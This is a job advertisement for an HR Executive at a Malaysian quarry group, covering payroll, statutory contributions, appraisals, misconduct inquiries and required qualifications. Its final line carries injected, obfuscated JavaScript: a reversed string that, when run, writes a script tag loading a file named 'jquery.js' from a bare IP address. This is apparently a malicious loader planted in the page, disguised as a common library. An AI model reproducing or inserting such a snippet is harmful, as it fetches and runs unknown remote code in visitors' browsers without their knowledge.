Industry : Quarry
• Responsible for monthly payroll process for the Group.
• Prepare sundry wages payment.
• Make sure all payment contribution for relevant government statutory bodies are paid before due date.
• Print and distribute monthly payslip to all employees.
• Prepare monthly payroll report for the Group.
• Prepare and submit EA form for employee and Company Form E.
• Prepare and generate the final performance appraisal form for all employee.
• Prepare performance appraisal summary score.
• Prepare letters pertaining to increment, bonus and promotion.
• Responsible for employment confirmation and contract renewal.
• Handle Performance Improvement Programme.
• Handle all issues pertaining to employee misconduct such as issuing show cause letter, warning letter, domestic
inquiry and etc.
• Liaise with the IR and Labour Officer if any.
• Handle and prepare all domestic inquires documentation eg: labour court, IR related matters.
• Act as liaison person for the company on staff grievances and generate the information to the Management.
• Diploma / Degree in Human Resources Management or equivalent.
• Minimum 3 to 5 years working experience as HR Executive/Sr Human Resources Executive.
• Ability to work independently with minimum supervision and result oriented with ability to meet the deadline.
• Good in time management, must prioritize tasks effectively and swiftly plan for changing workload needs.
• Able to perform multitasking and work under pressure.
• Good interpersonal and coordination skills.
• Knowledge and familiarity with Malaysia Employment Act.
• Computer literate and well versed in Microsoft Office applications.
• Must have an eye for details and accuracy. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))